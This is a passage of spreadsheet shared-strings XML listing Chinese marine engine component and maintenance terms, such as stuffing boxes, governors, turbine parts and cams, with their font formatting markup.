        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>提升装置布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>题目</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>:</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助鼓风机系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>替换</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>OD</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填充片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函，冷却水连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函，塑料</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函工作台</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函孔盖</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函拉拔工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函排污系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料函箱滑油清扫系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>填料箱污油清洁系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ADJUSTING GEAR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>ADUSTING GEAR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>adjust</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>？）</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节螺钉导杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节手柄铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节套筒</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节轴组装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节装置的调整</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调矩螺旋桨遥控系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调频轮</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调频轮安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调频轮工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调频轮液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调频轮液压千斤顶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器，详细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放大器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器臂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器臂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器传动安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器传动装置箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器放大器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器放大器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器和驱动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器加压泵布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器驱动安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调油轴组件</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整机构</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整试验台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整轴安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铁钩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车功能测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车装置布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停缸要求</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停航期间检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停油活塞阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停增压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停止阀，总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停止状态辅机使用建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挺杆的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通风管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通风机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通风箱柜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通讯电缆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通讯设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用船级要求</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>通用工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>同步电动机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>同步箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>筒形销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透平侧插芯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透平侧水洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透平垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透平垫毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透平端密封</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透平端轴承壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透平干洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透平进口和出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透平喷嘴环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透平清洗设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透平水洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>透平转子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸耳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮的更换</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮公差</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮和凸轮传动检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮和凸轮盘检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮护板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮抛光工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮上</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>V</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮随动件的装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮维修</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮箱及座板</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
